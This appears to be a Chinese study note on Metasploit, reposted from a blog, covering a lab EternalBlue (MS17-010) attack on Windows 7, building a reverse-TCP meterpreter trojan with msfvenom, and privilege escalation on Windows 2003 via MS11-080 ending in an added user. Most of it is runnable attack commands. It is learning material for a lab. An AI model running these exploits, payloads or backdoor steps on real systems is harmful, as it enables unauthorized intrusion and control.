msf学习

一、使用ms17-010漏洞攻击win7靶机

攻击机:kali(虚拟机)  ip:192.168.202.128

靶机:win7(虚拟机)  ip:192.168.202.131

win7需关闭windows防火墙

使用nmap对靶机进行端口扫描:nmap -sS -A -v 192.168.202.131

445端口开放

msf中搜索ms17-010  search ms17-010

前两个是辅助模块中的,第三个适用于Win7和Server 2008 R2 (x64),第四个适用于Win8,第五个不知道

使用第三个exp  use exploit/windows/smb/ms17_010_eternalblue

查看payloads  show payloads

使用windows/x64/meterpreter/reverse_tcp这个payload  set payload windows/x64/meterpreter/reverse_tcp

查看配置  show options

设置RHOSTS和LHOST  set RHOSTS 192.168.202.131  set LHOST 192.168.202.128

运行  run

获得meterpreter会话

meterpreter详解:https://www.cnblogs.com/backlion/p/9484949.html

二、使用msf制作木马

攻击机:kali(虚拟机)  ip:192.168.202.128

靶机:win7 sp1(虚拟机)  ip:192.168.202.131

msfvenom生成各类Payload命令:https://www.huo119.com/post/909.shtm

msf生成windows木马  msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.202.128 LPORT=8866 -f exe > shell.exe

在根目录生成木马  shell.exe

使用监听模块  msf5 > use exploit/multi/handler

设置payload与生成木马所用的一致  set payload windows/x64/meterpreter/reverse_tcp

查看选项  show options

设置本地主机与端口与生成木马时一致  set LHOST 192.168.202.128  set LPORT 8866

运行  run

开始监听本地的8866端口

将生成的木马shell.exe复制到靶机win7中运行

攻击机kali中获得一个meterpreter会话

 

三、msf提权

攻击机:kali(虚拟机)  ip:192.168.202.128

靶机:windows2003(虚拟机)  ip:192.168.202.134

在windows2003中创建一个普通用户rns,密码是123456  net user rns 123456 /ad

 

注销,使用rns用户登录

使用msf生成木马获得该用户的meterpreter会话

获得该用户的shell  meterpreter > shell

exit退出shell,background使会话在后台运行

查看msf提权exp  msf5 > use exploit/windows/local

使用exploit/windows/local/ms11_080_afdjoinleaf  use exploit/windows/local/ms11_080_afdjoinleaf

查看选项,设置SESSION,运行

获得高权限meterpreter会话

添加用户  net user a a /add

原文地址:https://www.cnblogs.com/rnss/p/11341626.html